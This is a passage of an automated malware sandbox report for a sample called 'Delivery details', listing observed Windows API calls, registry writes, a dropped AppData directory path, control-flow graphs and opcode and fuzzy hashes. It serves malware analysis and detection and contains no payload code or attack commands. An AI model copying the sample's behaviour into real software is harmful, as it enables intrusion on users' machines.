                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer$CountTick
                                                                  • String ID: !Y
                                                                  • API String ID: 1092082344-3540414309
                                                                  • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                  • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                  • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                  • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 794 4015c1-4015d5 call 402c37 call 405d2c 799 401631-401634 794->799 800 4015d7-4015ea call 405cae 794->800 802 401663-40224a call 401423 799->802 803 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 799->803 807 401604-401607 call 405960 800->807 808 4015ec-4015ef 800->808 818 402885-40288c 802->818 819 402abf-402ace 802->819 803->819 824 40165b-40165e 803->824 815 40160c-40160e 807->815 808->807 812 4015f1-4015f8 call 40597d 808->812 812->807 828 4015fa-401602 call 4058e3 812->828 820 401610-401615 815->820 821 401627-40162f 815->821 818->819 825 401624 820->825 826 401617-401622 GetFileAttributesW 820->826 821->799 821->800 824->819 825->821 826->821 826->825 828->815
                                                                  APIs
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D3A
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                    • Part of subcall function 004058E3: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured,?,00000000,000000F0), ref: 0040164D
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured, xrefs: 00401640
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured
                                                                  • API String ID: 1892508949-3501646704
                                                                  • Opcode ID: 71936794605e59e2cdcdbf469d43b529cd82272ccd62be37bc64b204d99928a8
                                                                  • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                  • Opcode Fuzzy Hash: 71936794605e59e2cdcdbf469d43b529cd82272ccd62be37bc64b204d99928a8
                                                                  • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004064F2,80000002), ref: 004062C4
                                                                  • RegCloseKey.ADVAPI32(?,?,004064F2,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,driftsresultaters), ref: 004062CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: : Completed
                                                                  • API String ID: 3356406503-2954849223
                                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                  • Instruction ID: c3e7de0656b9710826ab6423f517e97bb9b3954c36c3ca231a2eb326ebdf078d
                                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                  • Instruction Fuzzy Hash: 80019A32500209EADF219F90CC09EDB3BA8EF55360F01803AFD16A21A0D738DA64DBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                  • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                  Strings
                                                                  • Error launching installer, xrefs: 004059A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                  • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                  • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                  • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                  • Instruction ID: 1a1db7b112f5c349f32c040b215ce8adb2231ea54f988815808aa67dfaaa6b76
                                                                  • Opcode Fuzzy Hash: 86ce5b7836e8efc76d9880a3b815598044ae852516a7a266a4593ffa0bd4c046
                                                                  • Instruction Fuzzy Hash: 6AA15271E04228CBDF28CFA8C8446ADBBB1FF44305F14816ED856BB281D7786A86DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                  • Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
                                                                  • Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
                                                                  • Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                  • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                  • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                  • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                  • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                  • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                  • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                  • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                  • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                  • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                  • Instruction ID: 968097f9e37e498ed83c4652799cdf8e1ebeb5c7fee57b8dc09d96684c556b9e
                                                                  • Opcode Fuzzy Hash: c52b64c4cba7ecf1fb5e1bb59396999cb3f4df188a1ab73f316032be63138ba7
                                                                  • Instruction Fuzzy Hash: 27712471E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                  • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                  • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                  • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(0040B5D8,00000023,00000011,00000002), ref: 00402429
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402469
                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,00000011,00000002), ref: 00402551
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID:
                                                                  • API String ID: 2655323295-0
                                                                  • Opcode ID: 35e6e7eefd86a95ec2f493a4987e613e5da277515d630d613e6a1d7d24eea922
                                                                  • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                  • Opcode Fuzzy Hash: 35e6e7eefd86a95ec2f493a4987e613e5da277515d630d613e6a1d7d24eea922
                                                                  • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
